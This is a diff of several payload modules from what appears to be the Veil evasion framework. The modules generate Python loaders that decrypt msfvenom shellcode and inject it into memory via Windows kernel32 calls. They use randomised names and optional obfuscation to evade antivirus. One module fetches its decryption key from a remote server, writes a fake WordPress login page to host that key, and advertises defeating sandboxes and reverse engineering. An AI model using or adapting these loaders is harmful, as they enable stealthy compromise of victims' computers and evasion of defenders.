+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
+
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
                 RandPtr = helpers.randomString()
@@ -58,10 +60,10 @@ class Payload:
                 RandDecodedShellcode = helpers.randomString()
                 RandShellCode = helpers.randomString()
                 RandPadding = helpers.randomString()
-        
+
                 # encrypt the shellcode and grab the randomized key
                 (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
-        
+
                 # Create Payload code
                 PayloadCode = 'import ctypes as avlol\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -77,8 +79,8 @@ class Payload:
                 PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + RandShellCode + ')))\n'
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -87,11 +89,11 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
                 RandPtr = helpers.randomString()
@@ -104,10 +106,10 @@ class Payload:
                 RandPadding = helpers.randomString()
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
-        
+
                 # encrypt the shellcode and grab the randomized key
                 (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
-        
+
                 # Create Payload code
                 PayloadCode = 'import ctypes as avlol\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -128,19 +130,19 @@ class Payload:
                 PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + RandShellCode + ')))\n'
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
-        if self.required_options["inject_method"][0].lower() == "heap":
-            if self.required_options["expire_payload"][0].lower() == "x":
-                
+        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
+
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
                 RandPtr = helpers.randomString()
@@ -154,10 +156,10 @@ class Payload:
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
                 HeapVar = helpers.randomString()
-    
+
                 # encrypt the shellcode and grab the randomized key
                 (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
-        
+
                 # Create Payload code
                 PayloadCode = 'import ctypes as avlol\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -174,8 +176,8 @@ class Payload:
                 PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -183,11 +185,11 @@ class Payload:
             else:
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
                 RandPtr = helpers.randomString()
@@ -204,7 +206,7 @@ class Payload:
 
                 # encrypt the shellcode and grab the randomized key
                 (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
-        
+
                 # Create Payload code
                 PayloadCode = 'import ctypes as avlol\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -226,18 +228,18 @@ class Payload:
                 PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
         else:
-            if self.required_options["expire_payload"][0].lower() == "x":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
                 RandPtr = helpers.randomString()
@@ -251,10 +253,10 @@ class Payload:
                 RandShellcode = helpers.randomString()
                 RandReverseShell = helpers.randomString()
                 RandMemoryShell = helpers.randomString()
-    
+
                 # encrypt the shellcode and grab the randomized key
                 (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
-        
+
                 # Create Payload code
                 PayloadCode = 'from ctypes import *\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -268,8 +270,8 @@ class Payload:
                 PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                 PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += RandShellcode + '()'
-    
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -277,11 +279,11 @@ class Payload:
             else:
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
                 RandPtr = helpers.randomString()
@@ -297,10 +299,10 @@ class Payload:
                 RandMemoryShell = helpers.randomString()
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
-    
+
                 # encrypt the shellcode and grab the randomized key
                 (EncodedShellcode, secret) = encryption.encryptAES(Shellcode)
-        
+
                 # Create Payload code
                 PayloadCode = 'from ctypes import *\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -319,8 +321,8 @@ class Payload:
                 PayloadCode += '\t' + RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                 PayloadCode += '\t' + RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += '\t' + RandShellcode + '()'
-    
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode

--- a/modules/payloads/python/shellcode_inject/aes_encrypt_HTTPKEY_Request.py
+++ b/modules/payloads/python/shellcode_inject/aes_encrypt_HTTPKEY_Request.py
@@ -2,33 +2,33 @@
 """
 
 This payload has AES encrypted shellcode stored on a webserver.  At runtime, the executable
-uses the key from a HTML requet holding the key, using md5 to hash the html output and produce 
+uses the key from a HTML requet holding the key, using md5 to hash the html output and produce
 required 16 Byte key. Than injects it into memory, and executes it.
 
 [*] Logic:
 - HTTP Request on your hosted webpage:                                     <-----
-    DOWN ----> Sleep and try to reach supplied webpage using HTTP response code 
+    DOWN ----> Sleep and try to reach supplied webpage using HTTP response code
     UP ----> Preform MD5 hash of HTML of webpage:
         MD5 ---> pass to decryption function:
-            CalL Shellcode ----> Shellcode invojes callback: WIN 
+            CalL Shellcode ----> Shellcode invojes callback: WIN
 
 
 [*] Benefits:
-- Uses urllib2 to make get request against supplied server and returns the 
+- Uses urllib2 to make get request against supplied server and returns the
   HTML text for md5 hashing.
 - Prevents Key being deployed with payload, preventing payload to run in sandbox
   if target server is taken offline during initial deployment.
 - Once use of payload is over, take down webserver to prevent future infections
-- Static and future dynamic RE is near impossible without proper data collection. 
-- Proper web log monitoring will identify when webserver is burnt and crucial to 
-  remove key to prevent future ability to RE binary. Defenders would need to capture 
+- Static and future dynamic RE is near impossible without proper data collection.
+- Proper web log monitoring will identify when webserver is burnt and crucial to
+  remove key to prevent future ability to RE binary. Defenders would need to capture
   live memory to capture key.
 - Devloped custom HTML login page to be hosted as key for payload
 
 
 
 ---------------------------------------
-Based off AES encrypt module by @christruncer 
+Based off AES encrypt module by @christruncer
 
 module by @KillSwitch-GUI: Alex Rymdeko-Harvey
 
@@ -41,34 +41,36 @@ from modules.common import encryption
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
-        self.description = """AES Encrypted shellcode is decrypted upon HTTP request, injected into memory, and executed. 
+        self.description = """AES Encrypted shellcode is decrypted upon HTTP request, injected into memory, and executed.
         [*] Usage: Deploy webserver with cloned website, activate html page hosting key at specified URL. After building payload
         with Veil bring down hosted page. after delivery of binary stand up stagging server and watch the shells come."""
         self.language = "python"
         self.extension = "py"
         self.rating = "Excellent"
-        
+
         self.shellcode = shellcode.Shellcode()
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["Virtual", "Virtual, Void, Heap"],
-                                 "sleep_time" : ["60", "Set the sleep time between HTTP Key request"],
-                                 "target_server" : ["http://www.site.com/wordpress.html", "Set target URI path of the decryption key"],
-                                 "html_file_path" : ["/root/Desktop/", "Set the output of HTML file name"]}
 
-        
-        
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["Virtual", "Virtual, Void, Heap"],
+                                    "SLEEP_TIME"     : ["60", "Set the sleep time between HTTP Key request"],
+                                    "TARGET_SERVER"  : ["http://www.site.com/wordpress.html", "Set target URI path of the decryption key"],
+                                    "HTML_FILE_PATH" : ["/root/Desktop/", "Set the output of HTML file name"]
+                                }
+
+
+
     def generate(self):
-        if self.required_options["inject_method"][0].lower() == "virtual":
-                target_server = str(self.required_options["target_server"][0])
-                target_html_file = str(target_server.split('/')[-1]) 
+        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
+                TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
+                target_html_file = str(TARGET_SERVER.split('/')[-1])
 
-                
+
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
 
@@ -94,17 +96,17 @@ class Payload:
                 RandHttpstring = helpers.randomString()
 
                 # Genrate Random HTML code for webserver to host key file
-               
-                f = open(str(self.required_options["html_file_path"][0]) + target_html_file,'w')
-                html_data = """ 
+
+                f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
+                html_data = """
                 <!DOCTYPE html>
                 <!--[if IE 8]>
                         <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                     <![endif]-->
                 <!--[if !(IE 8) ]><!-->
                 <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
-            
-    
+
+
                 <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                     <p>
                         <label for="user_login">Username<br>
@@ -128,12 +130,12 @@ class Payload:
 
 
                     <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
-    
+
                     </div>
-                   
+
                         <div class="clear"></div>
-    
-    
+
+
                     </body></html>
                 """
                 html_data += '<!--'+ RandHttpstring +'-->'
@@ -143,7 +145,7 @@ class Payload:
 
                 # encrypt the shellcode and grab the HTTP-Md5-Hex Key from new function
                 (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
-        
+
                 # Create Payload code
                 PayloadCode =  'import ctypes\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -153,11 +155,11 @@ class Payload:
                 PayloadCode += 'import md5\n'
                 PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
                 # Define Target Server "Key hosting server"
-                PayloadCode += RandKeyServer + ' = ' '"'+ target_server +'"' '\n'
+                PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
                 PayloadCode += 'while True:\n'
                 PayloadCode += ' try:\n'
                 # Open Target Server with HTTP GET request
-                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n' 
+                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
                 # Check to see if server returns a 200 code or if not its most likely a 400 code
                 PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
                 # Opening and requesting HTML from Target Server
@@ -174,7 +176,7 @@ class Payload:
                 PayloadCode += '   break\n'
                 # At any point it fails you will be in sleep for supplied time
                 PayloadCode += ' except URLError, e:\n'
-                PayloadCode += '  time.sleep('+ self.required_options["sleep_time"][0] +')\n'
+                PayloadCode += '  time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
                 PayloadCode += '  pass\n'
                 # Execute Shellcode inject
                 PayloadCode += RandPadding + ' = \'{\'\n'
@@ -187,19 +189,19 @@ class Payload:
                 PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + RandShellCode + ')))\n'
                 PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                 PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
-        elif self.required_options["inject_method"][0].lower() == "heap":
-                target_server = str(self.required_options["target_server"][0])
-                target_html_file = str(target_server.split('/')[-1])  
-            
+        elif self.required_options["INJECT_METHOD"][0].lower() == "heap":
+                TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
+                target_html_file = str(TARGET_SERVER.split('/')[-1])
+
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
                 RandPtr = helpers.randomString()
@@ -213,7 +215,7 @@ class Payload:
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
                 HeapVar = helpers.randomString()
-    
+
                 # Define Random Variable Names for HTTP functions
                 RandResponse = helpers.randomString()
                 RandHttpKey = helpers.randomString()
@@ -225,17 +227,17 @@ class Payload:
                 RandHttpstring = helpers.randomString()
 
                 # Genrate Random HTML code for webserver to host key file
-               
-                f = open(str(self.required_options["html_file_path"][0]) + target_html_file,'w')
-                html_data = """ 
+
+                f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
+                html_data = """
                 <!DOCTYPE html>
                 <!--[if IE 8]>
                         <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                     <![endif]-->
                 <!--[if !(IE 8) ]><!-->
                 <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
-            
-    
+
+
                 <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                     <p>
                         <label for="user_login">Username<br>
@@ -259,12 +261,12 @@ class Payload:
 
 
                     <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
-    
+
                     </div>
-                   
+
                         <div class="clear"></div>
-    
-    
+
+
                     </body></html>
                 """
                 html_data += '<!--'+ RandHttpstring +'-->'
@@ -274,7 +276,7 @@ class Payload:
 
                 # encrypt the shellcode and grab the randomized key
                 (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
-        
+
                 # Create Payload code
                 PayloadCode =  'import ctypes\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -284,11 +286,11 @@ class Payload:
                 PayloadCode += 'import md5\n'
                 PayloadCode += 'from urllib2 import Request, urlopen, URLError\n'
                 # Define Target Server "Key hosting server"
-                PayloadCode += RandKeyServer + ' = ' '"'+ target_server +'"' '\n'
+                PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
                 PayloadCode += 'while True:\n'
                 PayloadCode += ' try:\n'
                 # Open Target Server with HTTP GET request
-                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n' 
+                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
                 # Check to see if server returns a 200 code or if not its most likely a 400 code
                 PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
                 # Opening and requesting HTML from Target Server
@@ -305,7 +307,7 @@ class Payload:
                 PayloadCode += '   break\n'
                 # At any point it fails you will be in sleep for supplied time
                 PayloadCode += ' except URLError, e:\n'
-                PayloadCode += '  time.sleep('+ self.required_options["sleep_time"][0] +')\n'
+                PayloadCode += '  time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
                 PayloadCode += '  pass\n'
                 # Execute Shellcode inject
                 PayloadCode += RandPadding + ' = \'{\'\n'
@@ -319,19 +321,19 @@ class Payload:
                 PayloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + RandPtr + '),' + RandBuf + ',ctypes.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += RandHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + RandPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
                 PayloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + RandHt + '),ctypes.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
         else:
-            if self.required_options["expire_payload"][0].lower() == "x":
-                target_server = str(self.required_options["target_server"][0])
-                target_html_file = str(target_server.split('/')[-1]) 
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
+                TARGET_SERVER = str(self.required_options["TARGET_SERVER"][0])
+                target_html_file = str(TARGET_SERVER.split('/')[-1])
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 ShellcodeVariableName = helpers.randomString()
                 RandPtr = helpers.randomString()
@@ -345,7 +347,7 @@ class Payload:
                 RandShellcode = helpers.randomString()
                 RandReverseShell = helpers.randomString()
                 RandMemoryShell = helpers.randomString()
-    
+
                 # Define Random Variable Names for HTTP functions
                 RandResponse = helpers.randomString()
                 RandHttpKey = helpers.randomString()
@@ -357,17 +359,17 @@ class Payload:
                 RandHttpstring = helpers.randomString()
 
                 # Genrate Random HTML code for webserver to host key file
-               
-                f = open(str(self.required_options["html_file_path"][0]) + target_html_file,'w')
-                html_data = """ 
+
+                f = open(str(self.required_options["HTML_FILE_PATH"][0]) + target_html_file,'w')
+                html_data = """
                 <!DOCTYPE html>
                 <!--[if IE 8]>
                         <html xmlns="http://www.w3.org/1999/xhtml" class="ie8" lang="en-US">
                     <![endif]-->
                 <!--[if !(IE 8) ]><!-->
                 <html xmlns="http://www.w3.org/1999/xhtml" lang="en-US"><!--<![endif]--><head>
-            
-    
+
+
                 <form name="loginform" id="loginform" action="http://mainpage/wp-login.php" method="post">
                     <p>
                         <label for="user_login">Username<br>
@@ -391,12 +393,12 @@ class Payload:
 
 
                     <p id="backtoblog"><a href="http://" title="Are you lost?">← Back to main page</a></p>
-    
+
                     </div>
-                   
+
                         <div class="clear"></div>
-    
-    
+
+
                     </body></html>
                 """
                 html_data += '<!--'+ RandHttpstring +'-->'
@@ -406,7 +408,7 @@ class Payload:
 
                 # encrypt the shellcode and grab the randomized key
                 (EncodedShellcode, secret) = encryption.encryptAES_http_request(Shellcode, html_data)
-        
+
                 # Create Payload code
                 PayloadCode = 'from ctypes import *\n'
                 PayloadCode += 'from Crypto.Cipher import AES\n'
@@ -418,11 +420,11 @@ class Payload:
                 PayloadCode += 'from datetime import datetime\n'
                 PayloadCode += 'from datetime import date\n\n'
                 # Define Target Server "Key hosting server"
-                PayloadCode += RandKeyServer + ' = ' '"'+ target_server +'"' '\n'
+                PayloadCode += RandKeyServer + ' = ' '"'+ TARGET_SERVER +'"' '\n'
                 PayloadCode += 'while True:\n'
                 PayloadCode += ' try:\n'
                 # Open Target Server with HTTP GET request
-                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n' 
+                PayloadCode += '  ' + RandResponse + '= urlopen('+ RandKeyServer +') \n'
                 # Check to see if server returns a 200 code or if not its most likely a 400 code
                 PayloadCode += '  if ' + RandResponse + '.code == 200:\n'
                 # Opening and requesting HTML from Target Server
@@ -439,7 +441,7 @@ class Payload:
                 PayloadCode += '   break\n'
                 # At any point it fails you will be in sleep for supplied time
                 PayloadCode += ' except URLError, e:\n'
-                PayloadCode += '  time.sleep('+ self.required_options["sleep_time"][0] +')\n'
+                PayloadCode += '  time.sleep('+ self.required_options["SLEEP_TIME"][0] +')\n'
                 PayloadCode += '  pass\n'
                 PayloadCode += RandPadding + ' = \'{\'\n'
                 PayloadCode += RandDecodeAES + ' = lambda c, e: c.decrypt(base64.b64decode(e)).rstrip(' + RandPadding + ')\n'
@@ -449,8 +451,8 @@ class Payload:
                 PayloadCode += RandMemoryShell + ' = create_string_buffer(' + ShellcodeVariableName + ', len(' + ShellcodeVariableName + '))\n'
                 PayloadCode += RandShellcode + ' = cast(' + RandMemoryShell + ', CFUNCTYPE(c_void_p))\n'
                 PayloadCode += RandShellcode + '()'
-    
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode

--- a/modules/payloads/python/shellcode_inject/arc_encrypt.py
+++ b/modules/payloads/python/shellcode_inject/arc_encrypt.py
@@ -4,7 +4,7 @@ This payload has ARC encrypted shellcode stored within itself.  At runtime, the 
 uses the key within the file to decrypt the shellcode, injects it into memory, and executes it.
 
 
-Great examples and code adapted from 
+Great examples and code adapted from
 http://www.laurentluce.com/posts/python-and-cryptography-with-pycrypto/
 
 module by @christruncer
@@ -21,7 +21,7 @@ from modules.common import encryption
 
 
 class Payload:
-    
+
     def __init__(self):
         # required options
         self.description = "ARC4 Encrypted shellcode is decrypted at runtime with key in file, injected into memory, and executed"
@@ -30,21 +30,23 @@ class Payload:
         self.rating = "Excellent"
 
         self.shellcode = shellcode.Shellcode()
-        
-        # options we require user interaction for- format is {Option : [Value, Description]]}
-        self.required_options = {"compile_to_exe" : ["Y", "Compile to an executable"],
-                                 "use_pyherion" : ["N", "Use the pyherion encrypter"],
-                                 "inject_method" : ["Virtual", "Virtual, Void, Heap"],
-                                 "expire_payload" : ["X", "Optional: Payloads expire after \"X\" days"]}
-        
-    
+
+        # options we require user interaction for- format is {OPTION : [Value, Description]]}
+        self.required_options = {
+                                    "COMPILE_TO_EXE" : ["Y", "Compile to an executable"],
+                                    "USE_PYHERION"   : ["N", "Use the pyherion encrypter"],
+                                    "INJECT_METHOD"  : ["Virtual", "Virtual, Void, Heap"],
+                                    "EXPIRE_PAYLOAD" : ["X", "Optional: Payloads expire after \"Y\" days (\"X\" disables feature)"]
+                                }
+
+
     def generate(self):
-        if self.required_options["inject_method"][0].lower() == "virtual":
-            if self.required_options["expire_payload"][0].lower() == "x":
-        
+        if self.required_options["INJECT_METHOD"][0].lower() == "virtual":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
+
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -54,10 +56,10 @@ class Payload:
                 RandARCKey = helpers.randomString()
                 RandARCPayload = helpers.randomString()
                 RandEncShellCodePayload = helpers.randomString()
-                
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
-        
+
                 PayloadCode = 'from Crypto.Cipher import ARC4\n'
                 PayloadCode += 'import ctypes as avlol\n'
                 PayloadCode += RandIV + ' = \'' + iv + '\'\n'
@@ -70,8 +72,8 @@ class Payload:
                 PayloadCode += 'avlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += 'avlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
@@ -80,11 +82,11 @@ class Payload:
 
                 # Get our current date and add number of days to the date
                 todaysdate = date.today()
-                expiredate = str(todaysdate + timedelta(days=int(self.required_options["expire_payload"][0])))
+                expiredate = str(todaysdate + timedelta(days=int(self.required_options["EXPIRE_PAYLOAD"][0])))
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -96,10 +98,10 @@ class Payload:
                 RandEncShellCodePayload = helpers.randomString()
                 RandToday = helpers.randomString()
                 RandExpire = helpers.randomString()
-                
+
                 # encrypt the shellcode and get our randomized key/iv
                 (EncShellCode, (ARCKey, iv) ) = encryption.encryptARC(Shellcode)
-        
+
                 PayloadCode = 'from Crypto.Cipher import ARC4\n'
                 PayloadCode += 'import ctypes as avlol\n'
                 PayloadCode += 'from datetime import datetime\n'
@@ -117,18 +119,18 @@ class Payload:
                 PayloadCode += '\tavlol.windll.kernel32.RtlMoveMemory(avlol.c_int(' + RandPtr + '),' + RandBuf + ',avlol.c_int(len(' + ShellcodeVariableName + ')))\n'
                 PayloadCode += '\t' + RandHt + ' = avlol.windll.kernel32.CreateThread(avlol.c_int(0),avlol.c_int(0),avlol.c_int(' + RandPtr + '),avlol.c_int(0),avlol.c_int(0),avlol.pointer(avlol.c_int(0)))\n'
                 PayloadCode += '\tavlol.windll.kernel32.WaitForSingleObject(avlol.c_int(' + RandHt + '),avlol.c_int(-1))\n'
-        
-                if self.required_options["use_pyherion"][0].lower() == "y":
+
+                if self.required_options["USE_PYHERION"][0].lower() == "y":
                     PayloadCode = encryption.pyherion(PayloadCode)
 
                 return PayloadCode
 
-        if self.required_options["inject_method"][0].lower() == "heap":
-            if self.required_options["expire_payload"][0].lower() == "x":
+        if self.required_options["INJECT_METHOD"][0].lower() == "heap":
+            if self.required_options["EXPIRE_PAYLOAD"][0].lower() == "x":
 
                 # Generate Shellcode Using msfvenom
                 Shellcode = self.shellcode.generate()
-        
+
                 # Generate Random Variable Names
                 RandPtr = helpers.randomString()
                 RandBuf = helpers.randomString()
@@ -139,10 +141,10 @@ class Payload:
                 RandARCPayload = helpers.randomString()
